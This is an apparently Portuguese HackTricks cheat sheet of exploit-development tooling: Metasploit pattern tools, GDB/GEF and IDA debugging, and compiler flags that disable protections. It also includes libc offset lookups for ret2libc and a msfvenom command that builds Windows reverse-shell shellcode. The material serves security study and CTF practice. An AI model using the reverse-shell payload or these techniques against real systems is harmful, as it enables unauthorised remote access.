11 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Adquira o swag oficial do PEASS & HackTricks
-
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.
Metasploit
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
Shellcodes
Um shellcode é um pequeno pedaço de código que é usado como carga útil em uma exploração de software. O objetivo de um shellcode é fornecer ao invasor acesso remoto ao sistema comprometido. O shellcode é geralmente escrito em linguagem assembly e é executado diretamente na memória do sistema. Ele pode ser injetado em um processo em execução ou pode ser usado para criar um arquivo malicioso que, quando executado, executa o shellcode.
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
GDB
Instalação
apt-get install gdb
Parâmetros
-q --> Não mostrar banner
-x <arquivo> --> Autoexecutar instruções GDB a partir daqui
-p <pid> --> Anexar ao processo
Instruções
> disassemble main --> Desmontar a função
> disassemble 0x12345678
> set disassembly-flavor intel
> set follow-fork-mode child/parent --> Seguir processo criado
> p system --> Encontrar o endereço da função system
> help
> quit
> br func --> Adicionar breakpoint à função
> br *func+23
> br *0x12345678
> del NUM --> Deletar esse número de breakpoints
> watch EXPRESSÃO --> Parar se o valor mudar
> run --> Executar
> start --> Iniciar e parar em main
> n/next --> Executar próxima instrução (não entra)
> s/step --> Executar próxima instrução
> c/continue --> Continuar até o próximo breakpoint
> set $eip = 0x12345678 --> Mudar o valor de $eip
> info functions --> Informações sobre funções
> info functions func --> Informações sobre a função
> info registers --> Valor dos registradores
> bt --> Pilha
> bt full --> Pilha detalhada
> print variável
> print 0x87654321 - 0x12345678 --> Calcular
> examine o/x/u/t/i/s dir_mem/reg/ponteiro --> Mostra conteúdo em octal/hexadecimal/10/binário/instrução/ascii
- x/o 0xDir_hex
- x/2x $eip --> 2 palavras a partir de EIP
- x/2x $eip -4 --> $eip - 4
- x/8xb $eip --> 8 bytes (b-> byte, h-> 2 bytes, w-> 4 bytes, g-> 8 bytes)
- i r eip --> Valor de $eip
- x/w ponteiro --> Valor do ponteiro
- x/s ponteiro --> String apontada pelo ponteiro
- x/xw &ponteiro --> Endereço onde o ponteiro está localizado
- x/i $eip —> Instruções do EIP
GEF
checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings
#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61
#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
Truques
Mesmos endereços no GDB
Durante a depuração, o GDB terá endereços ligeiramente diferentes dos usados pelo binário quando executado. Você pode fazer com que o GDB tenha os mesmos endereços fazendo o seguinte:
unset env LINES
unset env COLUMNS
set env _=<caminho>
Coloque o caminho absoluto para o binário- Explorar o binário usando a mesma rota absoluta
PWD
eOLDPWD
devem ser os mesmos ao usar o GDB e ao explorar o binário
Rastrear para encontrar funções chamadas
Quando você tem um binário linkado estaticamente, todas as funções pertencerão ao binário (e não a bibliotecas externas). Nesse caso, será difícil identificar o fluxo que o binário segue para, por exemplo, solicitar entrada do usuário.
Você pode facilmente identificar esse fluxo executando o binário com gdb até que seja solicitada a entrada. Em seguida, pare com CTRL+C e use o comando bt
(backtrace) para ver as funções chamadas:
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
Servidor GDB
gdbserver --multi 0.0.0.0:23947
(no IDA, você deve preencher o caminho absoluto do executável na máquina Linux e na máquina Windows)
Ghidra
Encontrar o deslocamento da pilha
Ghidra é muito útil para encontrar o deslocamento para uma sobrecarga de buffer graças à informação sobre a posição das variáveis locais.
Por exemplo, no exemplo abaixo, uma sobrecarga de buffer em local_bc
indica que você precisa de um deslocamento de 0xbc
. Além disso, se local_10
for um cookie canário, isso indica que para sobrescrevê-lo a partir de local_bc
, há um deslocamento de 0xac
.
Lembre-se de que os primeiros 0x08 de onde o RIP é salvo pertencem ao RBP.
GCC
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2 --> Compilar sem proteções
-o --> Saída
-g --> Salvar código (GDB poderá vê-lo)
echo 0 > /proc/sys/kernel/randomize_va_space --> Para desativar o ASLR no Linux
Para compilar um shellcode:
nasm -f elf assembly.asm --> retorna um ".o"
ld assembly.o -o shellcodeout --> Executável
Objdump
-d --> Desmontar seções executáveis (ver opcodes de um shellcode compilado, encontrar ROP Gadgets, encontrar endereço de função...)
-Mintel --> Sintaxe Intel
-t --> Tabela de símbolos
-D --> Desmontar tudo (endereço da variável estática)
-s -j .dtors --> seção dtors
-s -j .got --> seção got
-D -s -j .plt --> seção plt descompilada
-TR --> Relocações
ojdump -t --dynamic-relo ./exec | grep puts --> Endereço de "puts" para modificar em GOT
objdump -D ./exec | grep "VAR_NAME" --> Endereço de uma variável estática (essas são armazenadas na seção DATA).
Despejos de núcleo
- Execute
ulimit -c unlimited
antes de iniciar meu programa - Execute
sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t
- sudo gdb --core=<path/core> --quiet
Mais
ldd executable | grep libc.so.6 --> Endereço (se ASLR, então isso muda toda vez)
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done --> Loop para ver se o endereço muda muito
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system --> Deslocamento de "system"
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh --> Deslocamento de "/bin/sh"
strace executable --> Funções chamadas pelo executável
rabin2 -i ejecutable --> Endereço de todas as funções
Inmunity debugger
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
IDA
Depuração em Linux remoto
Dentro da pasta do IDA, você pode encontrar binários que podem ser usados para depurar um binário dentro de um Linux. Para fazer isso, mova o binário linux_server ou linux_server64 para dentro do servidor Linux e execute-o dentro da pasta que contém o binário:
./linux_server64 -Ppass
Em seguida, configure o depurador: Depurador (remoto linux) --> Opções de processo...:
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Adquira o swag oficial do PEASS & HackTricks
-
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.